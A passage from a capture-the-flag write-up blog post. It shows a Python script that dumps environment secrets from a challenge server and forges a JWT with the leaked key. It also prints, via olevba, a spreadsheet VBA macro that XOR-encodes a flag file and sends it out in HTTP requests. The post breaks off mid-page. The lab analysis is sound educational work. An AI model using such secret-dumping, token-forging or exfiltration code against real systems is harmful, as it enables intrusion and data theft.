punctuation\">,</span><span class=\"token string\">\"2ervnWvp24g0pHZ81V3W9j2k0NmrkY1Z\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"T4yLN35GKLhxTgaykWxdgROCAwIBE3FO\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"HW8UkDvnQ8HFrTkyLHOIMMwywiTvCwfS\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"Cc5LKVk8n2N6F5BD9shXDlBX0NYG5RP3\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"YB64wqRiqblY7Bhk2z03bvwYLF9pk8o8\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"OxcOm5DyESp49smKwYmb6N9sr2yjZPv3\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"khmmeFNPFAhizYWKyvYMnLA7GVsJNvDt\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"Q3aoz6KBVGScMKS1Jfr6ewy9ix8q9elJ\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"jwbZUL8C5rj7DeuCEKZBGokgEh4ujMk1\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"LlqhKxf2yh8loi7ydfBBg18QKjDS33H0\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"kpSKlqhaNIL8g2EgACu3353i1p3Hh2CJ\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"n9tt6MNRJRoY8SIKqEoZnqxJpZmujQuR\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"1l4w5VOiIQ4pf7rid49GvvaXkhD5yIcw\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"ddl17btjos89HSpMlz4w1esNdp1BbPA7\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"jYyikfLWMl2nwZKLPZOI7yoX6Gsafj6Y\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"nx65kRioTaH87erafNtKaogarwPZYgn4\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"CU6ITn3A3r6PI089rdqbldt1MKSBOR8e\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"AYenVSd8ShOKt7in9tLAUTb1IPRminC4\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"BWO7KhzutnIAYRNdiUi6s4PMMheBFC4A\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"HlFqicDoJqA12cmHy8bnZd0GuSSqqL8q\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"8J71fW0218FzmBkF8ttefJrz7BpVtI8F\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"9QCWBIwQaNedL5NrTrymVUln0X9zDaPg\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"WbUwqhFlnuycALJgSSYb0VjeAgNtIhan\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"4GagZFf0emVWMqVZGuSQ0Wt3oesDqTId\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"hJgMfU0P4DZoXEQ3jPLmQqYrMcLL6tMq\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"Ie4Ct3weRbyqVZuU8D5WEJ9WzDaGkUeG\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"HBQW4v8Jx72LIeSA3gssnxODtUiR12iY\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"dlPoTSiQQhQW0LArsYjaXOlg5FhCECNX\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"1cLnEiDa0ZBFZMg0sRnB6uAGssFooEwd\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"h9ZZhUm8LRlXcTwSyPkhbyeH8WopzgK1\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"b6dQeUSvK6BaKu6hqGKjac1wljmECerf\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"vOW0m1zK5Ene3eEFxoYlGBDY6PhMG6Ug\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"4Hmer55iqHNq4fMbUgLTT96KDsceFHQz\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"TS9mqDcYUu9DUA1b9QoPqSeLMZFJNCKq\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"3zzwJVC13tWXVaBSwumerFZX10ZEwSx5\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"AL7Q1tqteIiAMoDAKLmx3PQ7uCtb1WCy\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"ggnR5ZzLSVr12T8k7cyRMAdlBuOLOQAr\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"w9SSZPc1qWUAGWE8pyLeB9XIRO79mzDs\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"u2YrePZCdoytCV6Eiund5dcubFdq2hPx\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"JShVnYgvoW5Lim3WL3qlqRMoTBGU4ATF\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"rnWQN9Hda8uDMoEqSdVGzvEtXuFJRZTT\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"u6dGg8b4YO8NylRJlTVnURjBxMlRmtVy\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"sD2esH8RTuqsD23PlfGCE0q5JdjnLb6t\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"ELfvFcLKnMyCwj7ruRbSkZKghcY4R2k6\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"xkzsLBLgP6dzDZYeiTzlwFpdsdS53fbg\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"L3VHzsrMHOPXtxfjsX9IEuMdWXiAN4lA\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"WGzrln1mR9mAgIYeCkkYZm5RIvdajkAi\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"9e1Y8jnY3j7Lkf8a03szPcqPqPDSGv6y\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"yTYSAZPsUbDCZbOg6XYBlFm7q6G4v3aq\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"rDmj6xnsGnm0MJQHvpuSbSXmkvanFQca\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"QFNahJX4von8pvpS5cy6bh2tyWGEcJwK\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"4LulvNMUoxwKcKXZm7DQxGOyZmUDAxn7\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"OiGiv5uCIyfNlTf0iePAiNe6lX3pVvJ7\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"nY8G2nYcKhvEJ5s2BD4SHECmTKKn1CSL\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"1K4qLxDn5gLF6gzcbetXP6HqGpghXmcI\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"4B4feCWkGFTlsoBI8Nxca380Xyv9sfA6\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"cDg0B5zh6q632VASxaeXNejqBABNFpWE\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"jZN0vVGts01Zr0xIJ6o2b6InEolghLr5\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"D8YzDAIwPFfLxwFcoCZSW02NzAoRM0lo\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"YCtiLWwcqptffHjTurKWv0zWlm87upmg\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"iSf2RPy3sdNeP6roA80UkxgqMrkOoXdf\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"nQD8z2wBoGOyIZ0311jUWAF0YlXsvg41\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"8ChT1ap67PVswJSBp6l7K8XLB8xlu89t\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"h83hTYu1lSFrhnMn1YrUxXdhRyy7lITP\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"oIjgXMJi0VvqTTvEY4G6ys7BjbQD9bpD\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"sd8CGK9j5eD0G8UUp0UkdgLc7tjxbkom\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"gSsaLGJVrbCvhXDa2tsgR9tZpzfd7gbS\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"GMBb01VPPfnMxJJTANYwfYnckBv0tB2w\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"JcMLJHRDcwmZ7T4OyoKZHg3A952Rbc3L\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"fLJBKWU3l5o7N1XxxVlG4JwyHCDqhJFY\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"ABgupVqa3fWHnbF6u4JH2tIzn4nuXf8e\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"1rJ4C9rcoWaW40fZEGA4vUY11azYLw04\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"aOLKa8rN9em0kQ0sfLeoRmVXY7L17Il1\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"6FND9ZASwt4GYHLuoCwFZ6JXYcYHuAh2\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"PqGpPjPKySbkf9tZkLS2X63xMHCwNUto\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"lNcHGKv23aHR7BApWAC0uOz067fmOaM6\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"60rV2f60cvJW5FXPf6RwdqSz2nKeJ5Nz\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"OZS5oCbUw8B0MtdSwxIkOHKn2N9xJhBw\"</span><span class=\"token punctuation\">]</span>\n<span class=\"token keyword\">with</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"out.txt\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"w\"</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">as</span> f<span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">for</span> word <span class=\"token keyword\">in</span> words<span class=\"token punctuation\">:</span>\n        response <span class=\"token operator\">=</span> requests<span class=\"token punctuation\">.</span>get<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"https://forensics-emuc2-b6abd8652aa4.2024.ductf.dev/api/env/</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>word<span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span><span class=\"token punctuation\">)</span>\n        f<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span>response<span class=\"token punctuation\">.</span>text<span class=\"token punctuation\">)</span></code></pre></div>\n<p>While digging through the dumped files, I found information called <code class=\"language-text\">JWT_SECRET</code>.</p>\n<p>This appears to be the JWT secret key.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token assign-left variable\">JWT_SECRET</span><span class=\"token operator\">=</span>3gHsCBkpZLi99zyiPqfY/NfFJqZzmNL4BAhYN8rAjRn49baTcnmyGISLD6T58XcWIUYrBfltI2iq2N6OHQSrfqBRFxFta61PvmnfRyn8Ep8T55lvLT8Es62kN3x35Bcb0OZmOGmM/zKf2qadcBq3Nbq1MiIVKJMz4w3JOk4orwFPtSNpNh8uaSQQUNMKTT6cvD9bvRvFNeeHYSPhDFwayPIRr5TJ+BpIRTUTfc1C3WCKoOuXCz2t+ISZo5yYwZ6U5w7NKFTTuDqMP/dXevkVykuntdej55XE3fsCP+UVFUT2JrY+Z9Q1aKTgavQR5smYVn93RlpbFwCoSStoANnoi</code></pre></div>\n<p>With that, it seemed possible to use arbitrary data as a JWT token.</p>\n<p>Using the following script, I created a JWT token with <code class=\"language-text\">subject_id</code> changed to 1.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">import</span> jwt\npayload <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span><span class=\"token string\">\"subject_id\"</span><span class=\"token punctuation\">:</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"exp\"</span><span class=\"token punctuation\">:</span> <span class=\"token number\">1720649521</span><span class=\"token punctuation\">}</span>\nsecret <span class=\"token operator\">=</span> <span class=\"token string\">r\"3gHsCBkpZLi99zyiPqfY/NfFJqZzmNL4BAhYN8rAjRn49baTcnmyGISLD6T58XcWIUYrBfltI2iq2N6OHQSrfqBRFxFta61PvmnfRyn8Ep8T55lvLT8Es62kN3x35Bcb0OZmOGmM/zKf2qadcBq3Nbq1MiIVKJMz4w3JOk4orwFPtSNpNh8uaSQQUNMKTT6cvD9bvRvFNeeHYSPhDFwayPIRr5TJ+BpIRTUTfc1C3WCKoOuXCz2t+ISZo5yYwZ6U5w7NKFTTuDqMP/dXevkVykuntdej55XE3fsCP+UVFUT2JrY+Z9Q1aKTgavQR5smYVn93RlpbFwCoSStoANnoi\"</span>\ntoken <span class=\"token operator\">=</span> jwt<span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">,</span> secret<span class=\"token punctuation\">,</span> algorithm<span class=\"token operator\">=</span><span class=\"token string\">\"HS512\"</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>token<span class=\"token punctuation\">)</span></code></pre></div>\n<p>When I used this to call <code class=\"language-text\">/api/flag</code>, I was able to obtain the correct flag as shown below.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/46c7002156f50fc4c649cb27dfc34031/72aae/image-20240711060528407.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 52.083333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAABVklEQVQoz5VSa2+DMAzk//+6flj50BapLRRIIJBACBAeNycrUx+bplk6GWJ88fkIsjRF0zRY19XDxbSsqJoe6zIjTW8QovTnj99s768RVLVE4Zp4jlpKDMMA3RkkrIIdB/DkhvgSg/ECVSUIFZRSMMZgHMc3BJxLnM8MeV4QGFSjMBIpjYeFJiyKFscjw+XCqS4IuYcjfJx6QyCExOFwpYYMt9uXfCkV5ZaaOtS1xvVaI0lqlKXytcnau2a8S+Yk5eMjxOl0QhiG2O/32O12PnPOYe0ErQc0fQs90iWT8ehsB2MN2tGdayykyBO6CeOY0XQ5IUOWZV6SI9NaPxnhsmt02J5f6wFjClEkyE1FktzC5TPBsjzt6LfYaiS59qZwXhFh6V12C+/73ru2Ef5kwOtFfkJHGEXsTlqQqwX9d4J2ZzHP8xvhXxEY4yaZiWD+lvgo47+Enw20BvqstVP8AAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/46c7002156f50fc4c649cb27dfc34031/8ac56/image-20240711060528407.webp 240w,\n/static/46c7002156f50fc4c649cb27dfc34031/d3be9/image-20240711060528407.webp 480w,\n/static/46c7002156f50fc4c649cb27dfc34031/e46b2/image-20240711060528407.webp 960w,\n/static/46c7002156f50fc4c649cb27dfc34031/6bfb6/image-20240711060528407.webp 964w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/46c7002156f50fc4c649cb27dfc34031/8ff5a/image-20240711060528407.png 240w,\n/static/46c7002156f50fc4c649cb27dfc34031/e85cb/image-20240711060528407.png 480w,\n/static/46c7002156f50fc4c649cb27dfc34031/d9199/image-20240711060528407.png 960w,\n/static/46c7002156f50fc4c649cb27dfc34031/72aae/image-20240711060528407.png 964w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/46c7002156f50fc4c649cb27dfc34031/d9199/image-20240711060528407.png\"\n            alt=\"image-20240711060528407\"\n            title=\"image-20240711060528407\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"macro-magicforensic\" style=\"position:relative;\"><a href=\"#macro-magicforensic\" aria-label=\"macro magicforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Macro Magic(Forensic)</h2>\n<blockquote>\n<p>We managed to pull this excel spreadsheet artifact from one of our Outpost machines. Its got something sus happening under the hood. After opening we found and captured some suspicious traffic on our network. Can you find out what this traffic is and find the flag!</p>\n</blockquote>\n<p>The challenge provides a suspicious macro file and a packet capture as artifacts.</p>\n<p>For now, I used <code class=\"language-text\">olevba</code> to extract the script from the macro file.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">olevba Monke.xlsm</code></pre></div>\n<p>The code extracted from it was as follows.</p>\n<div class=\"gatsby-highlight\" data-language=\"visualbasic\"><pre class=\"language-visualbasic\"><code class=\"language-visualbasic\">Public Function anotherThing(B As String, C As String) As String\n    Dim I As Long\n    Dim A As String\n    For I = 1 To Len(B)\n        A = A &amp; Chr(Asc(Mid(B, I, 1)) Xor Asc(Mid(C, (I - 1) Mod Len(C) + 1, 1)))\n    Next I\n    anotherThing = A\nEnd Function\n\nPublic Function importantThing()\n    Dim tempString As String\n    Dim tempInteger As Integer\n    Dim I As Integer\n    Dim J As Integer\n    For I = 1 To 5\n        Cells(I, 2).Value = WorksheetFunction.RandBetween(0, 1000)\n    Next I\n    For I = 1 To 5\n        For J = I + 1 To 5\n            If Cells(J, 2).Value &lt; Cells(I, 2).Value Then\n                tempString = Cells(I, 1).Value\n                Cells(I, 1).Value = Cells(J, 1).Value\n                Cells(J, 1).Value = tempString\n                tempInteger = Cells(I, 2).Value\n                Cells(I, 2).Value = Cells(J, 2).Value\n                Cells(J, 2).Value = tempInteger\n            End If\n        Next J\n    Next I\nEnd Function\n\nPublic Function totalyFine(A As String) As String\n    Dim B As String\n    B = Replace(A, &quot; &quot;, &quot;-&quot;)\n    totalyFine = B\nEnd Function\n\nSub macro1()\n    Dim Path As String\n    Dim wb As Workbook\n    Dim A As String\n    Dim B As String\n    Dim C As String\n    Dim D As String\n    Dim E As String\n    Dim F As String\n    Dim G As String\n    Dim H As String\n    Dim J As String\n    Dim K As String\n    Dim L As String\n    Dim M As String\n    Dim N As String\n    Dim O As String\n    Dim P As String\n    Dim Q As String\n    Dim R As String\n    Dim S As String\n    Dim T As String\n    Dim U As String\n    Dim V As String\n    Dim W As String\n    Dim X As String\n    Dim Y As String\n    Dim Z As String\n    Dim I As Long\n    N = importantThing()\n    K = &quot;Yes&quot;\n    S = &quot;Mon&quot;\n    U = forensics(K)\n    V = totalyFine(U)\n    D = &quot;Ma&quot;\n    J = &quot;https://play.duc.tf/&quot; + V\n    superThing (J)\n    J = &quot;http://flag.com/&quot;\n    superThing (J)\n    G = &quot;key&quot;\n    J = &quot;http://play.duc.tf/&quot;\n    superThing (J)\n    J = &quot;http://en.wikipedia.org/wiki/Emu_War&quot;\n    superThing (J)\n    N = importantThing()\n    Path = ThisWorkbook.Path &amp; &quot;\\flag.xlsx&quot;\n    Set wb = Workbooks.Open(Path)\n    Dim valueA1 As Variant\n    valueA1 = wb.Sheets(1).Range(&quot;A1&quot;).Value\n    MsgBox valueA1\n    wb.Close SaveChanges:=False\n    F = &quot;gic&quot;\n    N = importantThing()\n    Q = &quot;Flag: &quot; &amp; valueA1\n    H = &quot;Try Harder&quot;\n    U = forensics(H)\n    V = totalyFine(U)\n    J = &quot;http://downunderctf.com/&quot; + V\n    superThing (J)\n    W = S + G + D + F\n    O = doThing(Q, W)\n    M = anotherThing(O, W)\n    A = something(O)\n    Z = forensics(O)\n    N = importantThing()\n    P = &quot;Pterodactyl&quot;\n    U = forensics(P)\n    V = totalyFine(U)\n    J = &quot;http://play.duc.tf/&quot; + V\n    superThing (J)\n    T = totalyFine(Z)\n    MsgBox T\n    J = &quot;http://downunderctf.com/&quot; + T\n    superThing (J)\n    N = importantThing()\n    E = &quot;Forensics&quot;\n    U = forensics(E)\n    V = totalyFine(U)\n    J = &quot;http://play.duc.tf/&quot; + V\n    superThing (J)\n    \nEnd Sub\n\nPublic Function doThing(B As String, C As String) As String\n    Dim I As Long\n    Dim A As String\n    For I = 1 To Len(B)\n        A = A &amp; Chr(Asc(Mid(B, I, 1)) Xor Asc(Mid(C, (I - 1) Mod Len(C) + 1, 1)))\n    Next I\n    doThing = A\nEnd Function\n\nPublic Function superThing(ByVal A As String) As String\n    With CreateObject(&quot;MSXML2.ServerXMLHTTP.6.0&quot;)\n        .Open &quot;GET&quot;, A, False\n        .Send\n        superThing = StrConv(.responseBody, vbUnicode)\n    End With\nEnd Function\n\nPublic Function something(B As String) As String\n    Dim I As Long\n    Dim A As String\n    For I = 1 To Len(inputText)\n        A = A &amp; WorksheetFunction.Dec2Bin(Asc(Mid(B, I, 1)))\n    Next I\n    something = A\nEnd Function\n\nPublic Function forensics(B As String) As String\n    Dim A() As Byte\n    Dim I As Integer\n    Dim C As String\n    A = StrConv(B, vbFromUnicode)\n    For I = LBound(A) To UBound(A)\n        C = C &amp; CStr(A(I)) &amp; &quot; &quot;\n    Next I\n    C = Trim(C)\n    forensics = C\nEnd Function</code></pre></div>\n<p>It looks like <code class=\"language-text\">macro1</code> is executed first inside the macro file.</p>\n<p>Here, it seems to send GET requests to several URLs (the <code class=\"language-text\">superThing</code> function) and perform string manipulation.</p>\n<div class=\"gatsby-highlight\" data-language=\"visualbasic\"><pre class=\"language-visualbasic\"><code class=\"language-visualbasic\">N = importantThing()\nK = &quot;Yes&quot;\nS = &quot;Mon&quot;\nU = forensics(K)\nV = totalyFine(U)\nD = &quot;Ma&quot;\nJ = &quot;https://play.duc.tf/&quot; + V\nsuperThing (J)\nJ = &quot;http://flag.com/&quot;\nsuperThing (J)\nG = &quot;key&quot;\nJ = &quot;http://play.duc.tf/&quot;\nsuperThing (J)\nJ = &quot;http://en.wikipedia.org/wiki/Emu_War&quot;\nsuperThing (J)\nN = importantThing()\nPath = ThisWorkbook.Path &amp; &quot;\\flag.xlsx&quot;\nSet wb = Workbooks.Open(Path)\nDim valueA1 As Variant\nvalueA1 = wb.Sheets(1).Range(&quot;A1&quot;).Value\nMsgBox valueA1\nwb.Close SaveChanges:=False\nF = &quot;gic&quot;\nN = importantThing()\nQ = &quot;Flag: &quot; &amp; valueA1\nH = &quot;Try Harder&quot;\nU = forensics(H)\nV = totalyFine(U)\nJ = &quot;http://downunderctf.com/&quot; + V\nsuperThing (J)\nW = S + G + D + F\nO = doThing(Q, W)\nM = anotherThing(O, W)\nA = something(O)\nZ = forensics(O)\nN = importantThing()\nP = &quot;Pterodactyl&quot;\nU = forensics(P)\nV = totalyFine(U)\nJ = &quot;http://play.duc.tf/&quot; + V\nsuperThing (J)\nT = totalyFine(Z)\nMsgBox T\nJ = &quot;http://downunderctf.com/&quot; + T\nsuperThing (J)\nN = importantThing()\nE = &quot;Forensics&quot;\nU = forensics(E)\nV = totalyFine(U)\nJ = &quot;http://play.duc.tf/&quot; + V\nsuperThing (J)</code></pre></div>\n<p>If you inspect the HTTP requests, you can see that several requests include hyphen-separated byte sequences generated by the <code class=\"language-text\">forensics</code> and <code class=\"language-text\">totalyFine</code> functions.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 924px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/cee9c309bd479719717d2b0b82f787c4/9a1cf/image-20240711071929428.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 24.166666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA4klEQVQY03WQy26DMBBF2SbQdZuQ/gLYYGxsoDxKG6VE/P/fnNpWpUpVuji69441Mxonp3PO8/mF0yUnf71wfEo5pEcO2TFqyP+S/WqaZp6UxDpL21tELVGmwQ0d2hoaj+0dVVMjVRUJ/hHSo41BNw2J8ea+bbwNA+u68rG+46zj63ZDKYWUEilkVFEKyrKM+pdYF4JEqZrtvrEsM9frJ8s8ofymfd+ZpolxnPzbEpd1XRebQvMjiqIgqaqKcRqxbUvf9zj/BaE2zzODz2FgGByytZZwkdaaxi81RmN+fKiFvm/sYZsCj9a1ywAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/cee9c309bd479719717d2b0b82f787c4/8ac56/image-20240711071929428.webp 240w,\n/static/cee9c309bd479719717d2b0b82f787c4/d3be9/image-20240711071929428.webp 480w,\n/static/cee9c309bd479719717d2b0b82f787c4/c3b05/image-20240711071929428.webp 924w\"\n              sizes=\"(max-width: 924px) 100vw, 924px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/cee9c309bd479719717d2b0b82f787c4/8ff5a/image-20240711071929428.png 240w,\n/static/cee9c309bd479719717d2b0b82f787c4/e85cb/image-20240711071929428.png 480w,\n/static/cee9c309bd479719717d2b0b82f787c4/9a1cf/image-20240711071929428.png 924w\"\n            sizes=\"(max-width: 924px) 100vw, 924px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/cee9c309bd479719717d2b0b82f787c4/9a1cf/image-20240711071929428.png\"\n            alt=\"image-20240711071929428\"\n            title=\"image-20240711071929428\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Most of them are meaningless strings like <code class=\"language-text\">Try Harder</code>, but one piece of data looks like it is actually being encrypted.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/c803ec60af8b4e7f4fdfa0a8854b421a/e7aec/image-20240711072224376.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 18.333333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAw0lEQVQY032M2W6DMBQF+f+vi0oaRJpUatPEMdgmBoxZDFNMVKl96cPozt1OIq3g4TWVUyt6dUNZS06XHGVKmqZdaXDO0bZP997Tdd02+6lxp5QiKdyNey242A9k+0XpBAeZk+kdui7w3fM5Mk3Tv8Sb5KhfyMoDe5lyMnveTUZephx1ijRiPfIMw8A4jluNT7+97/utt9YihCC511cevcIOms/qTFbseFuDz+aVqtWEKRDCxDzPGzFoWZbNY1AI4Y9/A8fxMbovEs6oAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/c803ec60af8b4e7f4fdfa0a8854b421a/8ac56/image-20240711072224376.webp 240w,\n/static/c803ec60af8b4e7f4fdfa0a8854b421a/d3be9/image-20240711072224376.webp 480w,\n/static/c803ec60af8b4e7f4fdfa0a8854b421a/e46b2/image-20240711072224376.webp 960w,\n/static/c803ec60af8b4e7f4fdfa0a8854b421a/f992d/image-20240711072224376.webp 1440w,\n/static/c803ec60af8b4e7f4fdfa0a8854b421a/9ade6/image-20240711072224376.webp 1726w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/c803ec60af8b4e7f4fdfa0a8854b421a/8ff5a/image-20240711072224376.png 240w,\n/static/c803ec60af8b4e7f4fdfa0a8854b421a/e85cb/image-20240711072224376.png 480w,\n/static/c803ec60af8b4e7f4fdfa0a8854b421a/d9199/image-20240711072224376.png 960w,\n/static/c803ec60af8b4e7f4fdfa0a8854b421a/07a9c/image-20240711072224376.png 1440w,\n/static/c803ec60af8b4e7f4fdfa0a8854b421a/e7aec/image-20240711072224376.png 1726w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/c803ec60af8b4e7f4fdfa0a8854b421a/d9199/image-20240711072224376.png\"\n            alt=\"image-20240711072224376\"\n            title=\"image-20240711072224376\"\n            